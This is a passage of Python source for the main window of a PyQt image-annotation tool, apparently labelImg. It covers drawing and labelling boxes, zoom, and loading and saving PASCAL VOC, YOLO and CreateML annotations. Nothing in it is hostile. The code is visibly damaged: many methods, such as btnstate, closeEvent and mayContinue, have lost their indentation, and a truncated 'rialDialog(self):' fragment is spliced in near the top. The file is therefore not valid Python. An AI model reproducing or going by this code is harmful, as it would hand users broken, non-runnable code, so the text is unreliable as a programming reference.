return ['C:\\Program Files\\Internet Explorer\\iexplore.exe']
elif osName == 'Linux':
return ['xdg-open']
elif osName == 'Darwin':
return ['open']
rialDialog(self):
subprocess.Popen(self.screencastViewer + [self.screencast])
    def showInfoDialog(self):
        """Pop up an About box with app name, version, and Python version."""
        from libs.__init__ import __version__
        msg = u'Name:{0} \nApp Version:{1} \n{2} '.format(__appname__, __version__, sys.version_info)
        QMessageBox.information(self, u'Information', msg)
    def createShape(self):
        """Enter drawing mode to create a new box (beginner mode only)."""
        assert self.beginner()
        self.canvas.setEditing(False)
        self.actions.create.setEnabled(False)
    def toggleDrawingSensitive(self, drawing=True):
        """While a shape is being drawn, disable mode switching; on cancel,
        restore editing state (beginner mode)."""
        self.actions.editMode.setEnabled(not drawing)
        if not drawing and self.beginner():
            # Drawing was aborted (e.g. Escape): return to editing.
            print('Cancel creation.')
            self.canvas.setEditing(True)
            self.canvas.restoreCursor()
            self.actions.create.setEnabled(True)
    def toggleDrawMode(self, edit=True):
        """Switch the canvas between edit (True) and draw (False) modes."""
        self.canvas.setEditing(edit)
        self.actions.createMode.setEnabled(edit)
        self.actions.editMode.setEnabled(not edit)
    def setCreateMode(self):
        """Enter draw mode (advanced mode only)."""
        assert self.advanced()
        self.toggleDrawMode(False)
    def setEditMode(self):
        """Enter edit mode and refresh the selection (advanced mode only)."""
        assert self.advanced()
        self.toggleDrawMode(True)
        self.labelSelectionChanged()
def updateFileMenu(self):
currFilePath = self.filePath
def exists(filename):
return os.path.exists(filename)
menu = self.menus.recentFiles
menu.clear()
files = [f for f in self.recentFiles if f !=
currFilePath and exists(f)]
for i, f in enumerate(files):
icon = newIcon('labels')
action = QAction(
icon, '&%d %s' % (i + 1, QFileInfo(f).fileName()), self)
action.triggered.connect(partial(self.loadRecent, f))
menu.addAction(action)
    def popLabelListMenu(self, point):
        """Show the label-list context menu at *point* (widget coordinates)."""
        self.menus.labelList.exec_(self.labelList.mapToGlobal(point))
    def editLabel(self):
        """Prompt for a new label text for the selected item and apply it."""
        if not self.canvas.editing():
            return
        item = self.currentItem()
        if not item:
            return
        text = self.labelDialog.popUp(item.text())
        if text is not None:
            item.setText(text)
            # Recolour the item to match its (possibly new) label.
            item.setBackground(generateColorByText(text))
            self.setDirty()
            self.updateComboBox()
    def fileitemDoubleClicked(self, item=None):
        """Load the image whose entry was double-clicked in the file list."""
        currIndex = self.mImgList.index(ustr(item.text()))
        if currIndex < len(self.mImgList):
            filename = self.mImgList[currIndex]
            if filename:
                self.loadFile(filename)
def btnstate(self, item= None):
if not self.canvas.editing():
return
item = self.currentItem()
if not item:
item = self.labelList.item(self.labelList.count()-1)
difficult = self.diffcButton.isChecked()
try:
shape = self.itemsToShapes[item]
except:
pass
try:
if difficult != shape.difficult:
shape.difficult = difficult
self.setDirty()
else:
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
except:
pass
    def shapeSelectionChanged(self, selected=False):
        """Mirror canvas shape selection into the label list and enable the
        shape-specific actions accordingly."""
        if self._noSelectionSlot:
            # Selection originated from the label list; avoid feedback loop.
            self._noSelectionSlot = False
        else:
            shape = self.canvas.selectedShape
            if shape:
                self.shapesToItems[shape].setSelected(True)
            else:
                self.labelList.clearSelection()
        self.actions.delete.setEnabled(selected)
        self.actions.copy.setEnabled(selected)
        self.actions.edit.setEnabled(selected)
        self.actions.shapeLineColor.setEnabled(selected)
        self.actions.shapeFillColor.setEnabled(selected)
    def addLabel(self, shape):
        """Create a checkable list item for *shape* and register the mapping."""
        shape.paintLabel = self.displayLabelOption.isChecked()
        item = HashableQListWidgetItem(shape.label)
        item.setFlags(item.flags() | Qt.ItemIsUserCheckable)
        item.setCheckState(Qt.Checked)
        item.setBackground(generateColorByText(shape.label))
        self.itemsToShapes[item] = shape
        self.shapesToItems[shape] = item
        self.labelList.addItem(item)
        # At least one shape now exists: enable shape-dependent actions.
        for action in self.actions.onShapesPresent:
            action.setEnabled(True)
        self.updateComboBox()
    def remLabel(self, shape):
        """Remove *shape*'s list item and drop both direction mappings."""
        if shape is None:
            return
        item = self.shapesToItems[shape]
        self.labelList.takeItem(self.labelList.row(item))
        del self.shapesToItems[shape]
        del self.itemsToShapes[item]
        self.updateComboBox()
    def loadLabels(self, shapes):
        """Build Shape objects from parsed annotation tuples and show them.

        *shapes* is an iterable of (label, points, line_color, fill_color,
        difficult) tuples as produced by the annotation readers.
        """
        s = []
        for label, points, line_color, fill_color, difficult in shapes:
            shape = Shape(label=label)
            for x, y in points:
                # Points beyond the image edge are snapped back onto it;
                # that counts as a modification.
                x, y, snapped = self.canvas.snapPointToCanvas(x, y)
                if snapped:
                    self.setDirty()
                shape.addPoint(QPointF(x, y))
            shape.difficult = difficult
            shape.close()
            s.append(shape)
            if line_color:
                shape.line_color = QColor(*line_color)
            else:
                shape.line_color = generateColorByText(label)
            if fill_color:
                shape.fill_color = QColor(*fill_color)
            else:
                shape.fill_color = generateColorByText(label)
            self.addLabel(shape)
        self.updateComboBox()
        self.canvas.loadShapes(s)
def updateComboBox(self):
itemsTextList = [str(self.labelList.item(i).text()) for i in range(self.labelList.count())]
uniqueTextList = list(set(itemsTextList))
uniqueTextList.append("")
uniqueTextList.sort()
self.comboBox.update_items(uniqueTextList)
    def saveLabels(self, annotationFilePath):
        """Write the canvas shapes to *annotationFilePath* in the active format.

        The correct extension (.xml/.txt/.json) is appended when missing.
        Returns True on success; shows an error dialog and returns False on
        LabelFileError.
        """
        annotationFilePath = ustr(annotationFilePath)
        if self.labelFile is None:
            self.labelFile = LabelFile()
            self.labelFile.verified = self.canvas.verified

        def format_shape(s):
            # Serialize one Shape into the plain dict the writers expect.
            return dict(label=s.label,
                        line_color=s.line_color.getRgb(),
                        fill_color=s.fill_color.getRgb(),
                        points=[(p.x(), p.y()) for p in s.points],
                        difficult = s.difficult)

        shapes = [format_shape(shape) for shape in self.canvas.shapes]
        try:
            if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
                if annotationFilePath[-4:].lower() != ".xml":
                    annotationFilePath += XML_EXT
                self.labelFile.savePascalVocFormat(annotationFilePath, shapes, self.filePath, self.imageData,
                                                   self.lineColor.getRgb(), self.fillColor.getRgb())
            elif self.labelFileFormat == LabelFileFormat.YOLO:
                if annotationFilePath[-4:].lower() != ".txt":
                    annotationFilePath += TXT_EXT
                self.labelFile.saveYoloFormat(annotationFilePath, shapes, self.filePath, self.imageData, self.labelHist,
                                              self.lineColor.getRgb(), self.fillColor.getRgb())
            elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
                if annotationFilePath[-5:].lower() != ".json":
                    annotationFilePath += JSON_EXT
                self.labelFile.saveCreateMLFormat(annotationFilePath, shapes, self.filePath, self.imageData,
                                                  self.labelHist, self.lineColor.getRgb(), self.fillColor.getRgb())
            else:
                self.labelFile.save(annotationFilePath, shapes, self.filePath, self.imageData,
                                    self.lineColor.getRgb(), self.fillColor.getRgb())
            print('Image:{0} -> Annotation:{1}'.format(self.filePath, annotationFilePath))
            return True
        except LabelFileError as e:
            self.errorMessage(u'Error saving label data', u'<b>%s</b>' % e)
            return False
    def copySelectedShape(self):
        """Duplicate the selected shape on the canvas and select the copy."""
        self.addLabel(self.canvas.copySelectedShape())
        self.shapeSelectionChanged(True)
def comboSelectionChanged(self, index):
text = self.comboBox.cb.itemText(index)
for i in range(self.labelList.count()):
if text == "":
self.labelList.item(i).setCheckState(2)
elif text != self.labelList.item(i).text():
self.labelList.item(i).setCheckState(0)
else:
self.labelList.item(i).setCheckState(2)
    def labelSelectionChanged(self):
        """Select on the canvas the shape whose list item was selected."""
        item = self.currentItem()
        if item and self.canvas.editing():
            # Suppress the echo back from the canvas selection signal.
            self._noSelectionSlot = True
            self.canvas.selectShape(self.itemsToShapes[item])
            shape = self.itemsToShapes[item]
            # Mirror the shape's difficult flag into the checkbox.
            self.diffcButton.setChecked(shape.difficult)
    def labelItemChanged(self, item):
        """React to a label-list item change: renamed text updates the shape's
        label; otherwise the checkbox toggled the shape's visibility."""
        shape = self.itemsToShapes[item]
        label = item.text()
        if label != shape.label:
            shape.label = item.text()
            shape.line_color = generateColorByText(shape.label)
            self.setDirty()
        else:  # User probably changed item visibility
            self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
    def newShape(self):
        """Pop up and give focus to the label editor for a freshly drawn shape.

        position MUST be in global coordinates.
        """
        if not self.useDefaultLabelCheckbox.isChecked() or not self.defaultLabelTextLine.text():
            if len(self.labelHist) > 0:
                self.labelDialog = LabelDialog(
                    parent=self, listItem=self.labelHist)

            # Sync single class mode from PR#106
            if self.singleClassMode.isChecked() and self.lastLabel:
                text = self.lastLabel
            else:
                text = self.labelDialog.popUp(text=self.prevLabelText)
                self.lastLabel = text
        else:
            text = self.defaultLabelTextLine.text()

        # Add Chris
        self.diffcButton.setChecked(False)
        if text is not None:
            self.prevLabelText = text
            generate_color = generateColorByText(text)
            shape = self.canvas.setLastLabel(text, generate_color, generate_color)
            self.addLabel(shape)
            if self.beginner():  # Switch to edit mode.
                self.canvas.setEditing(True)
                self.actions.create.setEnabled(True)
            else:
                self.actions.editMode.setEnabled(True)
            self.setDirty()

            if text not in self.labelHist:
                self.labelHist.append(text)
        else:
            # Dialog cancelled: discard the half-drawn shape.
            self.canvas.resetAllLines()
    def scrollRequest(self, delta, orientation):
        """Scroll the canvas; *delta* is a wheel delta (120 units per notch)."""
        units = - delta / (8 * 15)
        bar = self.scrollBars[orientation]
        bar.setValue(bar.value() + bar.singleStep() * units)
    def setZoom(self, value):
        """Set an absolute zoom percentage and leave any fit mode."""
        self.actions.fitWidth.setChecked(False)
        self.actions.fitWindow.setChecked(False)
        self.zoomMode = self.MANUAL_ZOOM
        self.zoomWidget.setValue(value)
    def addZoom(self, increment=10):
        """Adjust the zoom by *increment* percentage points."""
        self.setZoom(self.zoomWidget.value() + increment)
    def zoomRequest(self, delta):
        """Zoom in/out on a wheel event, keeping the cursor over the same spot
        by moving the scrollbars proportionally afterwards."""
        # Current scrollbar positions/maxima, to measure the zoom's effect.
        h_bar = self.scrollBars[Qt.Horizontal]
        v_bar = self.scrollBars[Qt.Vertical]
        h_bar_max = h_bar.maximum()
        v_bar_max = v_bar.maximum()
        # Cursor position relative to this widget; converted to a 0..1
        # movement factor per axis (0 = far left/top, 1 = far right/bottom).
        cursor = QCursor()
        pos = cursor.pos()
        relative_pos = QWidget.mapFromGlobal(self, pos)
        cursor_x = relative_pos.x()
        cursor_y = relative_pos.y()
        w = self.scrollArea.width()
        h = self.scrollArea.height()
        # 10% padding: no need to hit the outermost pixel for a full move.
        margin = 0.1
        move_x = (cursor_x - margin * w) / (w - 2 * margin * w)
        move_y = (cursor_y - margin * h) / (h - 2 * margin * h)
        # clamp the values from 0 to 1
        move_x = min(max(move_x, 0), 1)
        move_y = min(max(move_y, 0), 1)
        # zoom in
        units = delta / (8 * 15)
        scale = 10
        self.addZoom(scale * units)
        # get the difference in scrollbar values
        # this is how far we can move
        d_h_bar_max = h_bar.maximum() - h_bar_max
        d_v_bar_max = v_bar.maximum() - v_bar_max
        # get the new scrollbar values
        new_h_bar_value = h_bar.value() + move_x * d_h_bar_max
        new_v_bar_value = v_bar.value() + move_y * d_v_bar_max
        h_bar.setValue(new_h_bar_value)
        v_bar.setValue(new_v_bar_value)
    def setFitWindow(self, value=True):
        """Fit the whole image in the window (mutually exclusive with fitWidth)."""
        if value:
            self.actions.fitWidth.setChecked(False)
        self.zoomMode = self.FIT_WINDOW if value else self.MANUAL_ZOOM
        self.adjustScale()
    def setFitWidth(self, value=True):
        """Fit the image width in the window (mutually exclusive with fitWindow)."""
        if value:
            self.actions.fitWindow.setChecked(False)
        self.zoomMode = self.FIT_WIDTH if value else self.MANUAL_ZOOM
        self.adjustScale()
def togglePolygons(self, value):
for item, shape in self.itemsToShapes.items():
item.setCheckState(Qt.Checked if value else Qt.Unchecked)
    def loadFile(self, filePath=None):
        """Load an image (or label) file and display it on the canvas.

        Falls back to the last-used file from settings when *filePath* is
        None. Returns True on success, False otherwise.
        """
        self.resetState()
        self.canvas.setEnabled(False)
        if filePath is None:
            filePath = self.settings.get(SETTING_FILENAME)
        # Make sure that filePath is a regular python string, rather than QString
        filePath = ustr(filePath)
        # Fix bug: An index error after select a directory when open a new file.
        unicodeFilePath = ustr(filePath)
        unicodeFilePath = os.path.abspath(unicodeFilePath)
        # Tzutalin 20160906 : Add file list and dock to move faster
        # Highlight the file item; if it is not part of the current directory
        # listing, drop the stale listing entirely.
        if unicodeFilePath and self.fileListWidget.count() > 0:
            if unicodeFilePath in self.mImgList:
                index = self.mImgList.index(unicodeFilePath)
                fileWidgetItem = self.fileListWidget.item(index)
                fileWidgetItem.setSelected(True)
            else:
                self.fileListWidget.clear()
                self.mImgList.clear()
        if unicodeFilePath and os.path.exists(unicodeFilePath):
            if LabelFile.isLabelFile(unicodeFilePath):
                try:
                    self.labelFile = LabelFile(unicodeFilePath)
                except LabelFileError as e:
                    self.errorMessage(u'Error opening file',
                                      (u"<p><b>%s</b></p>"
                                       u"<p>Make sure <i>%s</i> is a valid label file.")
                                      % (e, unicodeFilePath))
                    self.status("Error reading %s" % unicodeFilePath)
                    return False
                # A label file embeds the image data plus display colors.
                self.imageData = self.labelFile.imageData
                self.lineColor = QColor(*self.labelFile.lineColor)
                self.fillColor = QColor(*self.labelFile.fillColor)
                self.canvas.verified = self.labelFile.verified
            else:
                # Load image:
                # read data first and store for saving into label file.
                self.imageData = read(unicodeFilePath, None)
                self.labelFile = None
                self.canvas.verified = False
            # read() may return a QImage directly or raw bytes to decode.
            if isinstance(self.imageData, QImage):
                image = self.imageData
            else:
                image = QImage.fromData(self.imageData)
            if image.isNull():
                self.errorMessage(u'Error opening file',
                                  u"<p>Make sure <i>%s</i> is a valid image file." % unicodeFilePath)
                self.status("Error reading %s" % unicodeFilePath)
                return False
            self.status("Loaded %s" % os.path.basename(unicodeFilePath))
            self.image = image
            self.filePath = unicodeFilePath
            self.canvas.loadPixmap(QPixmap.fromImage(image))
            if self.labelFile:
                self.loadLabels(self.labelFile.shapes)
            self.setClean()
            self.canvas.setEnabled(True)
            self.adjustScale(initial=True)
            self.paintCanvas()
            self.addRecentFile(self.filePath)
            self.toggleActions(True)
            # Pick up any sibling annotation file (XML/TXT/JSON) as well.
            self.showBoundingBoxFromAnnotationFile(filePath)
            self.setWindowTitle(__appname__ + ' ' + filePath)
            # Default : select last item if there is at least one item
            if self.labelList.count():
                self.labelList.setCurrentItem(self.labelList.item(self.labelList.count()-1))
                self.labelList.item(self.labelList.count()-1).setSelected(True)
            self.canvas.setFocus(True)
            return True
        return False
    def showBoundingBoxFromAnnotationFile(self, filePath):
        """Load any existing annotation (XML, TXT, or JSON) for *filePath*.

        Looks in defaultSaveDir first (priority: PASCAL VOC XML, then YOLO
        TXT, then CreateML JSON); otherwise falls back to annotation files
        sitting next to the image.
        """
        if self.defaultSaveDir is not None:
            basename = os.path.basename(
                os.path.splitext(filePath)[0])
            # Parent directory name of the image; CreateML keeps one JSON
            # per directory rather than one per image.
            filedir = filePath.split(basename)[0].split(os.path.sep)[-2:-1][0]
            xmlPath = os.path.join(self.defaultSaveDir, basename + XML_EXT)
            txtPath = os.path.join(self.defaultSaveDir, basename + TXT_EXT)
            jsonPath = os.path.join(self.defaultSaveDir, filedir + JSON_EXT)
            if os.path.isfile(xmlPath):
                self.loadPascalXMLByFilename(xmlPath)
            elif os.path.isfile(txtPath):
                self.loadYOLOTXTByFilename(txtPath)
            elif os.path.isfile(jsonPath):
                self.loadCreateMLJSONByFilename(jsonPath, filePath)
        else:
            xmlPath = os.path.splitext(filePath)[0] + XML_EXT
            txtPath = os.path.splitext(filePath)[0] + TXT_EXT
            if os.path.isfile(xmlPath):
                self.loadPascalXMLByFilename(xmlPath)
            elif os.path.isfile(txtPath):
                self.loadYOLOTXTByFilename(txtPath)
    def resizeEvent(self, event):
        """Re-fit the image when the window resizes in a fit-* zoom mode."""
        if self.canvas and not self.image.isNull()\
           and self.zoomMode != self.MANUAL_ZOOM:
            self.adjustScale()
        super(MainWindow, self).resizeEvent(event)

    def paintCanvas(self):
        """Apply the current zoom to the canvas and repaint it."""
        assert not self.image.isNull(), "cannot paint null image"
        # zoomWidget holds a percentage; canvas.scale is a plain factor.
        self.canvas.scale = 0.01 * self.zoomWidget.value()
        self.canvas.adjustSize()
        self.canvas.update()

    def adjustScale(self, initial=False):
        """Recompute zoom from the active fit mode (fit-window on first load)."""
        value = self.scalers[self.FIT_WINDOW if initial else self.zoomMode]()
        self.zoomWidget.setValue(int(100 * value))

    def scaleFitWindow(self):
        """Return the scale factor that fits the whole image in the window."""
        e = 2.0  # So that no scrollbars are generated.
        w1 = self.centralWidget().width() - e
        h1 = self.centralWidget().height() - e
        a1 = w1 / h1
        # Calculate a new scale value based on the pixmap's aspect ratio.
        w2 = self.canvas.pixmap.width() - 0.0
        h2 = self.canvas.pixmap.height() - 0.0
        a2 = w2 / h2
        # Fit the more constrained dimension.
        return w1 / w2 if a2 >= a1 else h1 / h2

    def scaleFitWidth(self):
        """Return the scale factor that fills the central widget's width."""
        # The epsilon keeps a horizontal scrollbar from appearing.
        w = self.centralWidget().width() - 2.0
        return w / self.canvas.pixmap.width()
def closeEvent(self, event):
if not self.mayContinue():
event.ignore()
settings = self.settings
if self.dirname is None:
settings[SETTING_FILENAME] = self.filePath if self.filePath else ''
else:
settings[SETTING_FILENAME] = ''
settings[SETTING_WIN_SIZE] = self.size()
settings[SETTING_WIN_POSE] = self.pos()
settings[SETTING_WIN_STATE] = self.saveState()
settings[SETTING_LINE_COLOR] = self.lineColor
settings[SETTING_FILL_COLOR] = self.fillColor
settings[SETTING_RECENT_FILES] = self.recentFiles
settings[SETTING_ADVANCE_MODE] = not self._beginner
if self.defaultSaveDir and os.path.exists(self.defaultSaveDir):
settings[SETTING_SAVE_DIR] = ustr(self.defaultSaveDir)
else:
settings[SETTING_SAVE_DIR] = ''
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
settings[SETTING_LAST_OPEN_DIR] = self.lastOpenDir
else:
settings[SETTING_LAST_OPEN_DIR] = ''
settings[SETTING_AUTO_SAVE] = self.autoSaving.isChecked()
settings[SETTING_SINGLE_CLASS] = self.singleClassMode.isChecked()
settings[SETTING_PAINT_LABEL] = self.displayLabelOption.isChecked()
settings[SETTING_DRAW_SQUARE] = self.drawSquaresOption.isChecked()
settings[SETTING_LABEL_FILE_FORMAT] = self.labelFileFormat
settings.save()
    def loadRecent(self, filename):
        """Open a file from the recent-files menu, honoring unsaved changes."""
        if self.mayContinue():
            self.loadFile(filename)

    def scanAllImages(self, folderPath):
        """Recursively collect all Qt-readable image paths under *folderPath*.

        Returns absolute paths, naturally sorted case-insensitively.
        """
        extensions = ['.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
        images = []
        for root, dirs, files in os.walk(folderPath):
            for file in files:
                if file.lower().endswith(tuple(extensions)):
                    relativePath = os.path.join(root, file)
                    path = ustr(os.path.abspath(relativePath))
                    images.append(path)
        # In-place natural sort so '2.jpg' precedes '10.jpg'.
        natural_sort(images, key=lambda x: x.lower())
        return images
def changeSavedirDialog(self, _value=False):
if self.defaultSaveDir is not None:
path = ustr(self.defaultSaveDir)
else:
path = '.'
dirpath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Save annotations to the directory' % __appname__, path, QFileDialog.ShowDirsOnly
| QFileDialog.DontResolveSymlinks))
if dirpath is not None and len(dirpath) > 1:
self.defaultSaveDir = dirpath
self.statusBar().showMessage('%s . Annotation will be saved to %s' %
('Change saved folder', self.defaultSaveDir))
self.statusBar().show()
    def openAnnotationDialog(self, _value=False):
        """Open an annotation file chosen by the user for the current image.

        Requires an image to be open first. Only PASCAL VOC XML is handled
        here; other formats are loaded automatically alongside the image.
        """
        if self.filePath is None:
            self.statusBar().showMessage('Please select image first')
            self.statusBar().show()
            return
        path = os.path.dirname(ustr(self.filePath))\
            if self.filePath else '.'
        if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
            filters = "Open Annotation XML file (%s)" % ' '.join(['*.xml'])
            filename = ustr(QFileDialog.getOpenFileName(self,'%s - Choose a xml file' % __appname__, path, filters))
            if filename:
                # PyQt5 returns (filename, selected_filter); unwrap it.
                if isinstance(filename, (tuple, list)):
                    filename = filename[0]
                self.loadPascalXMLByFilename(filename)
def openDirDialog(self, _value=False, dirpath=None, silent=False):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
if silent!=True :
targetDirPath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
else:
targetDirPath = ustr(defaultOpenDirPath)
self.lastOpenDir = targetDirPath
self.importDirImages(targetDirPath)
def importDirImages(self, dirpath):
if not self.mayContinue() or not dirpath:
return
self.lastOpenDir = dirpath
self.dirname = dirpath
self.filePath = None
self.fileListWidget.clear()
self.mImgList = self.scanAllImages(dirpath)
self.openNextImg()
for imgPath in self.mImgList:
item = QListWidgetItem(imgPath)
self.fileListWidget.addItem(item)
def verifyImg(self, _value=False):
# Proceding next image without dialog if having any label
if self.filePath is not None:
try:
self.labelFile.toggleVerify()
except AttributeError:
# If the labelling file does not exist yet, create if and
# re-save it with the verified attribute.
self.saveFile()
if self.labelFile != None:
self.labelFile.toggleVerify()
else:
return
self.canvas.verified = self.labelFile.verified
self.paintCanvas()
self.saveFile()
    def openPrevImg(self, _value=False):
        """Navigate to the previous image in the directory listing.

        With auto-save enabled, dirty annotations are saved first (or the
        user is asked for a save directory if none is configured).
        """
        # Proceeding to the previous image without a dialog when auto-saving.
        if self.autoSaving.isChecked():
            if self.defaultSaveDir is not None:
                if self.dirty is True:
                    self.saveFile()
            else:
                self.changeSavedirDialog()
                return
        if not self.mayContinue():
            return
        if len(self.mImgList) <= 0:
            return
        if self.filePath is None:
            return
        currIndex = self.mImgList.index(self.filePath)
        if currIndex - 1 >= 0:
            filename = self.mImgList[currIndex - 1]
            if filename:
                self.loadFile(filename)

    def openNextImg(self, _value=False):
        """Navigate to the next image (or the first, if none is open).

        Mirrors openPrevImg's auto-save behavior.
        """
        # Proceeding to the next image without a dialog when auto-saving.
        if self.autoSaving.isChecked():
            if self.defaultSaveDir is not None:
                if self.dirty is True:
                    self.saveFile()
            else:
                self.changeSavedirDialog()
                return
        if not self.mayContinue():
            return
        if len(self.mImgList) <= 0:
            return
        filename = None
        if self.filePath is None:
            filename = self.mImgList[0]
        else:
            currIndex = self.mImgList.index(self.filePath)
            if currIndex + 1 < len(self.mImgList):
                filename = self.mImgList[currIndex + 1]
        if filename:
            self.loadFile(filename)
    def openFile(self, _value=False):
        """Show an open dialog for a single image or label file."""
        if not self.mayContinue():
            return
        path = os.path.dirname(ustr(self.filePath)) if self.filePath else '.'
        formats = ['*.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
        filters = "Image & Label files (%s)" % ' '.join(formats + ['*%s' % LabelFile.suffix])
        filename = QFileDialog.getOpenFileName(self, '%s - Choose Image or Label file' % __appname__, path, filters)
        if filename:
            # PyQt5 returns (filename, selected_filter); unwrap it.
            if isinstance(filename, (tuple, list)):
                filename = filename[0]
            self.loadFile(filename)

    def saveFile(self, _value=False):
        """Save annotations; target path comes from the save dir or the image.

        With a configured save directory the file is named after the image;
        otherwise it is saved beside the image, or via a dialog when no label
        file exists yet.
        """
        if self.defaultSaveDir is not None and len(ustr(self.defaultSaveDir)):
            if self.filePath:
                imgFileName = os.path.basename(self.filePath)
                savedFileName = os.path.splitext(imgFileName)[0]
                savedPath = os.path.join(ustr(self.defaultSaveDir), savedFileName)
                self._saveFile(savedPath)
        else:
            imgFileDir = os.path.dirname(self.filePath)
            imgFileName = os.path.basename(self.filePath)
            savedFileName = os.path.splitext(imgFileName)[0]
            savedPath = os.path.join(imgFileDir, savedFileName)
            # Keep the user-chosen extension when prompting (removeExt=False).
            self._saveFile(savedPath if self.labelFile
                           else self.saveFileDialog(removeExt=False))
    def saveFileAs(self, _value=False):
        """Save the current annotation under a user-chosen file name."""
        assert not self.image.isNull(), "cannot save empty image"
        self._saveFile(self.saveFileDialog())

    def saveFileDialog(self, removeExt=True):
        """Show a save dialog and return the chosen path ('' if cancelled).

        When *removeExt* is True the extension is stripped, because the
        format writer appends its own extension.
        """
        caption = '%s - Choose File' % __appname__
        filters = 'File (*%s)' % LabelFile.suffix
        openDialogPath = self.currentPath()
        dlg = QFileDialog(self, caption, openDialogPath, filters)
        dlg.setDefaultSuffix(LabelFile.suffix[1:])
        dlg.setAcceptMode(QFileDialog.AcceptSave)
        filenameWithoutExtension = os.path.splitext(self.filePath)[0]
        dlg.selectFile(filenameWithoutExtension)
        dlg.setOption(QFileDialog.DontUseNativeDialog, False)
        if dlg.exec_():
            fullFilePath = ustr(dlg.selectedFiles()[0])
            if removeExt:
                return os.path.splitext(fullFilePath)[0]  # Return file path without the extension.
            else:
                return fullFilePath
        return ''

    def _saveFile(self, annotationFilePath):
        """Write labels to *annotationFilePath* and report in the status bar."""
        if annotationFilePath and self.saveLabels(annotationFilePath):
            self.setClean()
            self.statusBar().showMessage('Saved to  %s' % annotationFilePath)
            self.statusBar().show()
    def closeFile(self, _value=False):
        """Close the current image, prompting about unsaved changes first."""
        if not self.mayContinue():
            return
        self.resetState()
        self.setClean()
        self.toggleActions(False)
        self.canvas.setEnabled(False)
        self.actions.saveAs.setEnabled(False)

    def deleteImg(self):
        """Delete the current image file from disk and advance to the next."""
        deletePath = self.filePath
        if deletePath is not None:
            # Advance first so the canvas never points at a removed file.
            self.openNextImg()
            if os.path.exists(deletePath):
                os.remove(deletePath)
            self.importDirImages(self.lastOpenDir)

    def resetAll(self):
        """Clear stored settings and restart the application."""
        self.settings.reset()
        self.close()
        proc = QProcess()
        # Relaunch this script as a detached process after closing.
        proc.startDetached(os.path.abspath(__file__))
def mayContinue(self):
if not self.dirty:
return True
else:
discardChanges = self.discardChangesDialog()
if discardChanges == QMessageBox.No:
return True
elif discardChanges == QMessageBox.Yes:
self.saveFile()
return True
else:
return False
    def discardChangesDialog(self):
        """Ask save/discard/cancel; returns the QMessageBox button clicked."""
        yes, no, cancel = QMessageBox.Yes, QMessageBox.No, QMessageBox.Cancel
        msg = u'You have unsaved changes, would you like to save them and proceed?\nClick "No" to undo all changes.'
        return QMessageBox.warning(self, u'Attention', msg, yes | no | cancel)

    def errorMessage(self, title, message):
        """Show a modal critical-error dialog; returns the clicked button."""
        return QMessageBox.critical(self, title,
                                    '<p><b>%s</b></p>%s' % (title, message))

    def currentPath(self):
        """Directory of the open image, or '.' when nothing is open."""
        return os.path.dirname(self.filePath) if self.filePath else '.'
    def chooseColor1(self):
        """Pick a new global line color and apply it to future shapes."""
        color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
                                          default=DEFAULT_LINE_COLOR)
        if color:
            self.lineColor = color
            # Newly drawn shapes read the class-level default color.
            Shape.line_color = color
            self.canvas.setDrawingColor(color)
            self.canvas.update()
            self.setDirty()

    def deleteSelectedShape(self):
        """Remove the selected shape and its label list entry."""
        self.remLabel(self.canvas.deleteSelected())
        self.setDirty()
        if self.noShapes():
            # Nothing left to operate on: disable shape-dependent actions.
            for action in self.actions.onShapesPresent:
                action.setEnabled(False)

    def chshapeLineColor(self):
        """Change the outline color of the currently selected shape only."""
        color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
                                          default=DEFAULT_LINE_COLOR)
        if color:
            self.canvas.selectedShape.line_color = color
            self.canvas.update()
            self.setDirty()

    def chshapeFillColor(self):
        """Change the fill color of the currently selected shape only."""
        color = self.colorDialog.getColor(self.fillColor, u'Choose fill color',
                                          default=DEFAULT_FILL_COLOR)
        if color:
            self.canvas.selectedShape.fill_color = color
            self.canvas.update()
            self.setDirty()

    def copyShape(self):
        """Finish a copy-drag: duplicate the shape and register its label."""
        self.canvas.endMove(copy=True)
        self.addLabel(self.canvas.selectedShape)
        self.setDirty()

    def moveShape(self):
        """Finish a move-drag and mark the document dirty."""
        self.canvas.endMove(copy=False)
        self.setDirty()
def loadPredefinedClasses(self, predefClassesFile):
if os.path.exists(predefClassesFile) is True:
with codecs.open(predefClassesFile, 'r', 'utf8') as f:
for line in f:
line = line.strip()
if self.labelHist is None:
self.labelHist = [line]
else:
self.labelHist.append(line)
def loadPascalXMLByFilename(self, xmlPath):
if self.filePath is None:
return
if os.path.isfile(xmlPath) is False:
return
self.set_format(FORMAT_PASCALVOC)
tVocParseReader = PascalVocReader(xmlPath)
shapes = tVocParseReader.getShapes()
self.loadLabels(shapes)
self.canvas.verified = tVocParseReader.verified
def loadYOLOTXTByFilename(self, txtPath):
if self.filePath is None:
return
if os.path.isfile(txtPath) is False:
return
self.set_format(FORMAT_YOLO)
tYoloParseReader = YoloReader(txtPath, self.image)
shapes = tYoloParseReader.getShapes()
print (shapes)
self.loadLabels(shapes)
self.canvas.verified = tYoloParseReader.verified
def loadCreateMLJSONByFilename(self, jsonPath, filePath):
if self.filePath is None:
return
if os.path.isfile(jsonPath) is False:
return
self.set_format(FORMAT_CREATEML)
crmlParseReader = CreateMLReader(jsonPath, filePath)
shapes = crmlParseReader.get_shapes()
self.loadLabels(shapes)
self.canvas.verified = crmlParseReader.verified
    def copyPreviousBoundingBoxes(self):
        """Copy the previous image's annotations onto the current image.

        NOTE(review): raises ValueError if the current file is not in
        mImgList — presumably only reachable when browsing a directory;
        confirm against the action wiring.
        """
